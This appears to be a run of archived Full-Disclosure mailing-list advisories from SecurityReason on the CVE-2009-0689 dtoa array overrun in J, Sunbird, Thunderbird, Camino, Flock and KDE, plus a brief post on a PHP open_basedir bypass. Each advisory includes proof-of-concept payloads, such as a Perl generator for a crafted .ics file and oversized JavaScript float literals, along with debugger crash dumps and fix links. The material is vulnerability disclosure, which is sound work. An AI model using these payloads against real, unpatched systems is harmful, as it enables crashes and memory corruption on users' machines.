m_interpreter.dll:public: void __thiscall Mfh_mp::inCompileMfile(char const *)(0x03ba1a86 "C:\Documents And Settings\WinXPa..", 1, 0x1977c300 "¤Ä.z", 0x0085) + 492 bytes [15] m_interpreter.dll:public: void __thiscall Mfh_mp::inCompileMOrLoadPFile(void)(0, 0x7a1459e2, 1, 0x1977c300 "¤Ä.z") + 266 bytes [16] m_interpreter.dll:public: virtual void __thiscall Mlm_mp::load_file(void)(0, 0x1977c300 "¤Ä.z", 0, 0x78134c58) + 32 bytes [17] m_dispatcher.dll:public: void __thiscall Mlm_MATLAB_fn::try_load(void)(0x19728978, 0x78159334, 1, 0x00c3ee54 "ŘďĂ") + 71 bytes [18] m_dispatcher.dll:public: void __thiscall Mlm_MATLAB_fn::load(void)(0, 0x19
[Full-disclosure] J 6.02.023 Array Overrun (code execution)
[ J 6.02.023 Array Overrun (code execution) ] Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - Dis.: 07.05.2009 - Pub.: 08.01.2010 CVE: CVE-2009-0689 CWE: CWE-119 Risk: High Remote: Yes Affected Software: - J 6.02.023 Array Overrun (code execution) NOTE: Prior versions may also be affected. Original URL: http://securityreason.com/achievement_securityalert/79 --- 0.Description --- The J programming language, developed in the early 1990s by Ken Iverson and Roger Hui, is a synthesis of APL (also by Iverson) and the FP and FL function-level languages created by John Backus. To avoid repeating the APL special character problem, J requires only the basic ASCII character set, resorting to the use of digraphs formed using the dot or colon characters to extend the meaning of the basic characters available. Additionally, to keep parsing and the language simple, and to compensate for the lack of character variation in ASCII, J treats many characters which might need to be balanced in other languages (such as [] {} "" `` or <>) as stand alone tokens or (with digraphs) treats them as part of a multi-character token. Being an array programming language, J is very terse and powerful, and is most suited to mathematical and statistical programming, especially when performing operations on matrices. J is a MIMD language. --- 1. J 6.02.023 Array Overrun (code execution) --- The main problem exist in dtoa implementation. J has the same dtoa as MatLab, OpenBSD, MacOS, Google, Opera etc. and it is the same like SREASONRES:20090625. http://securityreason.com/achievement_securityalert/63 but fix for SREASONRES:20090625, used by openbsd was not good. More information about fix for openbsd and similars SREASONRES:20091030, http://securityreason.com/achievement_securityalert/69 We can create any number of float, which will overwrite the memory. In Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it is possible to call 16<= elements of freelist array. --- 2. Proof of Concept (PoC) --- There are several ways to make a successful attack. Simplest assumed the creation of a script with a defective floating-point variable and execution it. This will allow the possibility of code execution. -expl.ijs-- cxib=0. -expl.ijs-- Program received signal SIGSEGV, Segmentation fault. 0x00452157 in ?? () eax0x4c2000 4988928 ecx0x2c667c 2909820 edx0x46d054 4640852 ebx0x48a607 296455 esp0x98f720 0x98f720 ebp0x98f77c 0x98f77c esi0x436380870662152 edi0x0 0 eip0x452157 0x452157 eflags 0x10206 [ PF IF RF ] cs 0x1b 27 ss 0x23 35 ds 0x23 35 es 0x23 35 fs 0x3b 59 gs 0x0 0 edi=0 (gdb) x/i $eip 0x452157: test %eax,(%eax) (gdb) x/x $eax 0x4c2000: 0x --- 3. SecurityReason Note --- Officialy SREASONRES:20090625 has been detected in: - OpenBSD - NetBSD - FreeBSD - MacOSX - Google Chrome - Mozilla Firefox - Mozilla Seamonkey - Mozilla Thunderbird - Mozilla Sunbird - Mozilla Camino - KDE (example: konqueror) - Opera - K-Meleon - F-Lock - MatLab - J This list is not yet closed. --- 4. Fix --- NetBSD fix (optimal): http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h OpenBSD fix: http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/li
[Full-disclosure] SecurityReason: Sunbird 0.9 Array Overrun (code execution) 0day
[ Sunbird 0.9 Array Overrun (code execution) ] Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - Dis.: 07.05.2009 - Pub.: 11.12.2009 CVE: CVE-2009-0689 CWE: CWE-199 Risk: High Remote: Yes Affected Software: - Sunbird 0.9 NOTE: Prior versions may also be affected. Original URL: http://securityreason.com/achievement_securityalert/77 --- 0.Description --- Mozilla Sunbird is a cross-platform calendar application, built upon Mozilla Toolkit. Our goal is to provide you with a full-featured and easy to use calendar application that you can use around the world. --- 1. Sunbird 0.9 Remote Array Overrun (Arbitrary code execution) --- The main problem exist in dtoa implementation. Sunbird has the same dtoa as Firefox, etc. Problem exist in js3250.dll (version 4.0.0 - Netscape 32-bit JavaScript Module) DLL library and it is the same like SREASONRES:20090625. http://securityreason.com/achievement_securityalert/63 but fix for SREASONRES:20090625, used by openbsd was not good. More information about fix for openbsd and similars SREASONRES:20091030, http://securityreason.com/achievement_securityalert/69 We can create any number of float, which will overwrite the memory. In Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it is possible to call 16<= elements of freelist array. --- 2. Proof of Concept (PoC) --- If we use Sunbird to open or import crafted "ics" file, Sunbird will crash. For example --- #!/usr/bin/perl # SecurityReason.com # sp3x # tested on WinXp SP3 my $header = "BEGIN:VCALENDAR\n". "PRODID:-//Mozilla.org/NONSGML Mozilla Calendar V1.1//EN\n". "VERSION:2.0\n". "BEGIN:VTIMEZONE\n". "TZID:Europe/Prague\n". "X-LIC-LOCATION:Europe/Prague\n". "BEGIN:DAYLIGHT\n". "TZOFFSETFROM:+0100\n". "TZOFFSETTO:+0200\n". "TZNAME:CEST\n". "DTSTART:19700329T02\n". "RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=3\n". "END:DAYLIGHT\n". "BEGIN:STANDARD\n". "TZOFFSETFROM:+0200\n". "TZOFFSETTO:+0100\n". "TZNAME:CET\n". "DTSTART:19701025T03\n". "RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=10\n". "END:STANDARD\n". "END:VTIMEZONE\n". "BEGIN:VEVENT\n". "CREATED:20091117T095214Z\n". "LAST-MODIFIED:20091117T095217Z\n". "DTSTAMP:20091117T095214Z\n". "UID:5d0cfefe-22f6-476e-93bf-bd13df140b18\n"; my $s = "SUMMARY:0."; my $expl = "1" x 296450; my $footer = "\nDTSTART;TZID=Europe/Prague:20100111T11\n". "DTEND;TZID=Europe/Prague:20100111T12\n". "END:VEVENT\n". "END:VCALENDAR\n"; open(myfile,'>>test.ics'); print myfile $header.$s.$expl.$footer; --- 0:000> r eax=015e06f9 ebx=0001 ecx=658cebec edx=0002 esi=015e0710 edi=015e06f9 eip=600f154f esp=0012e330 ebp=0012e35c iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010206 js3250!JS_strtod+0xb0a: 600f154f 8b01mov eax,dword ptr [ecx] ds:0023:658cebec= 0:000> ub 600f1551 js3250!JS_strtod+0xaf2: 600f1537 83c414 add esp,14h 600f153a 8b75fc mov esi,dword ptr [ebp-4] 600f153d e96bf5 jmp js3250!JS_strtod+0x68 (600f0aad) 600f1542 56 pushesi 600f1543 57 pushedi 600f1544 8b7c240cmov edi,dword ptr [esp+0Ch] 600f1548 8d0cbd08d01460 lea ecx,js3250!js_XMLClass+0x560 (6014d008)[edi*4] 600f154f 8b01mov eax,dword ptr [ecx] 0:000> !exchain 0012fc9c: USER32!_except_handler3+0 (7e39048f) CRT scope 0, func: USER32!UserCallWinProc+10a (7e39ac2d) 0012fcf4: USER32!_except_handler3+0 (7e39048f) CRT scope 0, filter: USER32!DispatchMessageWorker+113 (7e39074a) func: USER32!DispatchMessageWorker+126 (7e390762) 0012fd5c: sunbird!jpeg_mem_term+eb7 (00849745) 0012ffb0: sunbird!jpeg_fdct_islow+266a4 (00848818) 0012ffe0: kernel32!_except_handler3+0 (7c839ac0) CRT scope 0, filter: kernel32!BaseProcessStart+29 (7c843882) func: kernel32!BaseProcessStart+3a (7c843898) Invalid exception stack at 0:000> k ChildEBP RetAddr WARNING: Stack unwind information not available. Following frames may be wrong. 0012e35c 600f15f3 js3250!JS_strtod+0xb0a 0012e37c 600f0ef9 js3250!JS_strtod+0xbae 0012e3f4 6010e8eb js3250!JS_strtod+0x4b4 0012e448 6010e3c6 js3250!JSLL_MinInt+0x1dcf 0012e46c 60103fb5 js3250!JSLL_MinInt+0x18aa 0012e5dc 6010195e js3250!js_Invoke+0x2c1b 0012e694 60101cb2 js3250!js_Invoke+0x5c4 0012e71c 60101e0a js3250!js_Invoke+0x918 0012e74c 6011350d js3250!js_Invoke+0xa70 0012e7a4 600e3c41 js3250!js_FindProperty+0x974 0012e7bc 004274cf js3250!JS_SetProperty+0x36 0012e978 0042593e sunbird!NS_RegistryGetFactory+
[Full-disclosure] SecurityReason: Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code execution)
[ Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code execution) ] Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - Dis.: 07.05.2009 - Pub.: 11.12.2009 CVE: CVE-2009-0689 CWE: CWE-119 Risk: High Remote: Yes Affected Software: - Thunderbird 2.0.0.23 Fixed in: - Thunderbird 3.0 - Thunderbird 2.0.0.24pre NOTE: Prior versions may also be affected. Original URL: http://securityreason.com/achievement_securityalert/78 --- 0.Description --- Thunderbird 2 includes many new features to help you manage your inbox. With Thunderbird 2, it?s easier to prioritize and find your important email with tags and the new find bar helps you find content within your email faster. Lightning brings the Sunbird calendar to the popular email client, Mozilla Thunderbird. Since it's an extension, Lightning is tightly integrated with Thunderbird, allowing it to easily perform email-related calendaring tasks. --- 1. Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code execution) --- The main problem exist in dtoa implementation. Thunderbird has the same dtoa as Firefox, etc. This problem affects many additional Add-ons for thunderbird. Example for affected Add-ons: - Lightning 0.9 - Thunderbrowse 3.2.6.7 - more and it is the same like SREASONRES:20090625. http://securityreason.com/achievement_securityalert/63 but fix for SREASONRES:20090625, used by openbsd was not good. More information about fix for openbsd and similars SREASONRES:20091030, http://securityreason.com/achievement_securityalert/69 We can create any number of float, which will overwrite the memory. In Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it is possible to call 16<= elements of freelist array. --- 2. Proof of Concept (PoC) --- (PoC for Lightning ) --- #!/usr/bin/perl # SecurityReason.com # sp3x # tested on WinXp SP3 my $header = "BEGIN:VCALENDAR\n". "PRODID:-//Mozilla.org/NONSGML Mozilla Calendar V1.1//EN\n". "VERSION:2.0\n". "BEGIN:VTIMEZONE\n". "TZID:Europe/Prague\n". "X-LIC-LOCATION:Europe/Prague\n". "BEGIN:DAYLIGHT\n". "TZOFFSETFROM:+0100\n". "TZOFFSETTO:+0200\n". "TZNAME:CEST\n". "DTSTART:19700329T02\n". "RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=3\n". "END:DAYLIGHT\n". "BEGIN:STANDARD\n". "TZOFFSETFROM:+0200\n". "TZOFFSETTO:+0100\n". "TZNAME:CET\n". "DTSTART:19701025T03\n". "RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=10\n". "END:STANDARD\n". "END:VTIMEZONE\n". "BEGIN:VEVENT\n". "CREATED:20091117T095214Z\n". "LAST-MODIFIED:20091117T095217Z\n". "DTSTAMP:20091117T095214Z\n". "UID:5d0cfefe-22f6-476e-93bf-bd13df140b18\n"; my $s = "SUMMARY:0."; my $expl = "1" x 296450; my $footer = "\nDTSTART;TZID=Europe/Prague:20100111T11\n". "DTEND;TZID=Europe/Prague:20100111T12\n". "END:VEVENT\n". "END:VCALENDAR\n"; open(myfile,'>>test.ics'); print myfile $header.$s.$expl.$footer; --- (PoC for Thunderbrowse ) --- var a=0.<?php echo str_repeat("1",33); ?>; --- When we use Thunderbrowse to see this site, Thunderbird will crash with: Program terminated with signal 11, Segmentation fault. #0 0xbb15d1e7 in ?? () eax0x0 0 ecx0xa 10 edx0x0 0 ebx0xbb16eb38 -1156125896 esp0xbfbfce58 0xbfbfce58 ebp0xbfbfce74 0xbfbfce74 esi0xb 11 edi0xb768e700 -1217861888 eip0xbb15d1e7 0xbb15d1e7 eflags 0x282[ SF IF ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0xab 171 gs 0xb3 179 (gdb) x/x ($eip) 0xbb15d1e7: Cannot access memory at address 0xbb15d1e7 (gdb) x/x ($esi) 0xb:Cannot access memory at address 0xb (gdb) x/x ($edi) 0xb768e700: 0x1c71c71c now esi=0xb and edi=0x1c71c71c (gdb) x/20x ($edi) 0xb768e700: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c 0xb768e710: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7 0xb768e720: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71 0xb768e730: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c 0xb768e740: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7 (gdb) x/50x ($edi)+37000 0xb7697788: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7 0xb7697798: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71 0xb76977a8: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c 0xb76977b8: 0xc71c71c7 0x71
[Full-disclosure] SecurityReason: Camino 1.6.10 Remote Array Overrun (Arbitrary code execution)
[ Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ] Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - Dis.: 07.05.2009 - Pub.: 11.12.2009 CVE: CVE-2009-0689 CWE: CWE-119 Risk: High Remote: Yes Affected Software: - Camino 1.6.10 Fixed in: - Camino 2.0 <= NOTE: Prior versions may also be affected. Original URL: http://securityreason.com/achievement_securityalert/76 --- 0.Description --- Camino (from the Spanish word camino meaning "way", "path" or "road") is a free, open source, GUI-based Web browser based on Mozilla's Gecko layout engine and specifically designed for the Mac OS X operating system. In place of an XUL-based user interface used by most Mozilla-based applications, Camino uses Mac-native Cocoa APIs, although it does not use native text boxes. --- 1. Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) --- The main problem exist in dtoa implementation. Camino has the same dtoa as Firefox, SeaMonkey, Chrome, Opera etc. and it is the same like SREASONRES:20090625. http://securityreason.com/achievement_securityalert/63 but fix for SREASONRES:20090625, used by openbsd was not good. More information about fix for openbsd and similars SREASONRES:20091030, http://securityreason.com/achievement_securityalert/69 We can create any number of float, which will overwrite the memory. In Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it is possible to call 16<= elements of freelist array. --- 2. Proof of Concept (PoC) --- --- var a=0.<?php echo str_repeat("1",296450); ?>; --- Process: Camino [153] Path:/Volumes/Camino/Camino.app/Contents/MacOS/Camino Identifier: org.mozilla.camino Version: 1.6.10 (1609.09.25) Code Type: X86 (Native) Parent Process: launchd [92] Date/Time: 2009-11-06 12:57:24.698 -0800 OS Version: Mac OS X 10.5.6 (9G55) Report Version: 6 Exception Type: EXC_BAD_ACCESS (SIGSEGV) Exception Codes: KERN_INVALID_ADDRESS at 0x7e33d590 Crashed Thread: 0 Thread 0 Crashed: 0 libSystem.B.dylib 0x01d7e325 tiny_malloc_from_free_list + 235 1 libSystem.B.dylib 0x01d7710d szone_malloc + 180 2 libSystem.B.dylib 0x01d77018 malloc_zone_malloc + 81 3 libSystem.B.dylib 0x01d76fac malloc + 55 4 libxpcom_core.dylib 0x00c5271d PL_DHashTableInit + 220 5 org.mozilla.camino 0x00389bac RuleHash::RuleHash(int) + 282 6 org.mozilla.camino 0x0038ae0e nsCSSRuleProcessor::GetRuleCascade(nsPresContext*) + 146 7 org.mozilla.camino 0x0038b215 nsCSSRuleProcessor::RulesMatching(PseudoRuleProcessorData*) + 27 8 org.mozilla.camino 0x003afbd0 EnumPseudoRulesMatching(nsIStyleRuleProcessor*, void*) + 24 9 org.mozilla.camino 0x003b0885 nsStyleSet::FileRules(int (*)(nsIStyleRuleProcessor*, void*), RuleProcessorData*) + 37 10 org.mozilla.camino 0x003b0c77 nsStyleSet::ResolvePseudoStyleFor(nsIContent*, nsIAtom*, nsStyleContext*, nsICSSPseudoComparator*) + 123 11 org.mozilla.camino 0x002cc924 nsCSSFrameConstructor::ConstructRootFrame(nsIContent*, nsIFrame**) + 134 12 org.mozilla.camino 0x002f617b PresShell::InitialReflow(int, int) + 1151 13 org.mozilla.camino 0x005a90d4 nsContentSink::StartLayout(int) + 342 14 org.mozilla.camino 0x00483354 HTMLContentSink::StartLayout() + 82 15 org.mozilla.camino 0x00486cb7 HTMLContentSink::OpenBody(nsIParserNode const&) + 193 16 org.mozilla.camino 0x001a60e8 CNavDTD::OpenBody(nsCParserNode const*) + 54 17 org.mozilla.camino 0x001a8b53 CNavDTD::HandleDefaultStartToken(CToken*, nsHTMLTag, nsCParserNode*) + 393 18 org.mozilla.camino 0x001aa3e5 CNavDTD::HandleStartToken(CToken*) + 623 19 org.mozilla.camino 0x0012 CNavDTD::HandleToken(CToken*, nsIParser*) + 1358 20 org.mozilla.camino 0x001a9a4d CNavDTD::BuildModel(nsIParser*, nsITokenizer*, nsITokenObserver*, nsIContentSink*) + 165 21 org.mozilla.camino 0x001a94ee CNavDTD::DidBuildModel(unsigned int, int, nsIParser*, nsIContentSink*) + 550 22 org.mozilla.camino 0x001b5e28 nsParser::DidBuildModel(unsigned int) + 90 23 org.mozilla.camino 0x001b83c7 nsParser::ResumeParse(int, int, int) + 661 24 org.mozilla.camino 0x001b59a8 nsParser::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 128 25 org.mozilla.camino 0x002076a0 nsDocumentOpenInfo::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 88 26 org.mozilla.camino 0x000f522a nsFileChannel::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 78 27
[Full-disclosure] SecurityReason: Flock 2.5.2 Remote Array Overrun (Arbitrary code execution)
[ Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) ] Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - Dis.: 07.05.2009 - Pub.: 11.12.2009 CVE: CVE-2009-0689 CWE: CWE-119 Risk: High Remote: Yes Affected Software: - Flock 2.5.2 Fixed in: - Flock 2.5.5 NOTE: Prior versions may also be affected. Original URL: http://securityreason.com/achievement_securityalert/75 --- 0.Description --- Flock is a web browser built on Mozilla.s Firefox codebase that specializes in providing social networking and Web 2.0 facilities built into its user interface. Flock v2.5 was officially released on May 19, 2009. The Flock browser is available as a free download, and supports Microsoft Windows, Mac OS X, and Linux platforms. --- 1. Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) --- The main problem exist in dtoa implementation. Flock has the same dtoa as Firefox, SeaMonkey, Chrome, Opera etc. and it is the same like SREASONRES:20090625. http://securityreason.com/achievement_securityalert/63 but fix for SREASONRES:20090625, used by openbsd was not good. More information about fix for openbsd and similars SREASONRES:20091030, http://securityreason.com/achievement_securityalert/69 We can create any number of float, which will overwrite the memory. In Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it is possible to call 16<= elements of freelist array. --- 2. Proof of Concept (PoC) --- --- var a=0.<?php echo str_repeat("1",296450); ?>; --- Program received signal SIGSEGV, Segmentation fault. 0x67c68740 in js3250!JS_DHashTableEnumerate () from C:\Program Files\Flock\js3250.dll (gdb) i r eax0x964619c7 -1773790777 ecx0x2 2 edx0x2 2 ebx0x2 2 esp0x20e7f0 0x20e7f0 ebp0x1 0x1 esi0x299d70043636480 edi0x299d70143636481 eip0x67c68740 0x67c68740 eflags 0x210202 [ IF RF ID ] cs 0x1b 27 ss 0x23 35 ds 0x23 35 Es 0x23 35 fs 0x3b 59 gs 0x0 0 (gdb) x/i 0x67c68740 0x67c68740 : mov0x67ce0458(,%edi,4),%eax (gdb) x/x $eax 0x964619c7: Cannot access memory at address 0x964619c7 --- 3. SecurityReason Note --- Officialy SREASONRES:20090625 has been detected in: - OpenBSD - NetBSD - FreeBSD - MacOSX - Google Chrome - Mozilla Firefox - Mozilla Seamonkey - Mozilla Thunderbird - Mozilla Sunbird - Mozilla Camino - KDE (example: konqueror) - Opera - K-Meleon - F-Lock This list is not yet closed. --- 4. Fix --- NetBSD fix (optimal): http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h OpenBSD fix: http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c http://www.openbsd.or
[Full-disclosure] PHP 5.3.1 open_basedir bypass
hi, in php 5.3.1 security changelog, we can read, that safe_mode bypass in tempnam() has been already fixed. But safe_mode in 5.3 line is deprecated. We can understand security fix for open_basedir bypass, but not for safe_mode in 5.3. Annoying is the fact, that exploit for bypass open_basedir or safe_mode in php 5.3.1 is avaliable in http://securityreason.com/achievement_exploitalert/14 we can use symlink trick like in http://securityreason.com/achievement_securityalert/70 The issue has been reported to PHP, but did not obtain a meaningful response. Very similar issue has been reproted in October 2006 by Stefan Esser (SREASON:1692) http://securityreason.com/securityalert/1692 This issue has been fixed. Small difference, with this is that we need create fake directories structure. -- Best Regards, pub 1024D/A6986BD6 2008-08-22 uid Maksymilian Arciemowicz (cxib) sub 4096g/0889FA9A 2008-08-22 http://securityreason.com http://securityreason.com/key/Arciemowicz.Maksymilian.gpg signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SecurityReason: KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution) ] Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - - Dis.: 07.05.2009 - - Pub.: 20.11.2009 CVE: CVE-2009-0689 Risk: High Remote: Yes Affected Software: - - KDELibs 4.3.3 NOTE: Prior versions may also be affected. Original URL: http://securityreason.com/achievement_securityalert/74 - --- 0.Description --- KDELibs is a collection of libraries built on top of Qt that provides frameworks and functionality for developers of KDE-compatible software. The KDELibs libraries are licensed under LGPL. - --- 1. KDE KDELibs 4.3.2 Remote Array Overrun (Arbitrary code execution) --- The main problem exist in dtoa implementation. KDE has a very similar dtoa algorithm to the BSD, Chrome and Mozilla products. Problem exist in dtoa.cpp file http://websvn.kde.org/tags/KDE/4.3.3/kdelibs/kjs/dtoa.cpp?revision=1042584&view=markup and it is the same like SREASONRES:20090625. http://securityreason.com/achievement_securityalert/63 but fix for SREASONRES:20090625, used by openbsd was not good. More information about fix for openbsd and similars SREASONRES:20091030, http://securityreason.com/achievement_securityalert/69 We can create any number of float, which will overwrite the memory. In Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it is possible to call 16<= elements of freelist array. - --- 2. Proof of Concept (PoC) --- - --- var a=0.<?php echo str_repeat("9",29); ?>; - --- If we use konqueror to see this PoC, konqueror will crash. For example - --- var a=0.<?php echo str_repeat("1",296450); ?>; - --- Program received signal SIGSEGV, Segmentation fault. [Switching to process 24845, thread 0x7e6e6800] 0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0 0x06db85c3 : mov%esi,(%ecx) #0 0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0 #1 0x0909901b in kjs_strtod () from /usr/local/lib/libkjs.so.5.0 #2 0x090738e5 in KJS::Lexer::lex () from /usr/local/lib/libkjs.so.5.0 #3 0x0907300c in kjsyylex () from /usr/local/lib/libkjs.so.5.0 #4 0x09072f86 in kjsyyparse () from /usr/local/lib/libkjs.so.5.0 #5 0x090805cf in KJS::Parser::parse () from /usr/local/lib/libkjs.so.5.0 #6 0x0908337f in KJS::InterpreterImp::evaluate () (gdb) i r eax0x0 0 ecx0x220ff000 571469824 edx0x0 0 ebx0x220fbb00 571456256 esp0xcfbc04e0 0xcfbc04e0 ebp0xcfbc0518 0xcfbc0518 esi0xc71c71c7 -954437177 edi0x0 0 eip0x21415c30x21415c3 esi=0x71c71c7 - --- 3. SecurityReason Note --- Officialy SREASONRES:20090625 has been detected in: - - OpenBSD - - NetBSD - - FreeBSD - - MacOSX - - Google Chrome - - Mozilla Firefox - - Mozilla Seamonkey - - KDE (example: konqueror) - - Opera - - K-Meleon This list is not yet closed. US-CERT declared that will inform all vendors about this issue, however, they did not do it. Even greater confusion caused new CVE number "CVE-2009-1563". Secunia has informed that this vulnerability was only detected in Mozilla Firefox, but nobody was aware that the problem affects other products like ( KDE, Chrome ) and it is based on "CVE-2009-0689". After some time Mozilla Foundation Security Advisory ("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html";) was updated with note : "The underlying flaw in the dtoa routines used by Mozilla appears to be essentially the same as that reported against the libc gdtoa routine by Maksymilian Arciemowicz ( CVE-2009-0689)". This fact ( new CVE number for Firefox Vulnerability )and PoC in javascript (from Secunia), forced us to official notification all other vendors. We publish all the individual advisories, to formally show all vulnerable software and to avoid wrong CVE number. We do not see any other way to fix this issue in all products. - --- 4. Fix --- NetBSD fix (optimal): http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h OpenBSD fix: 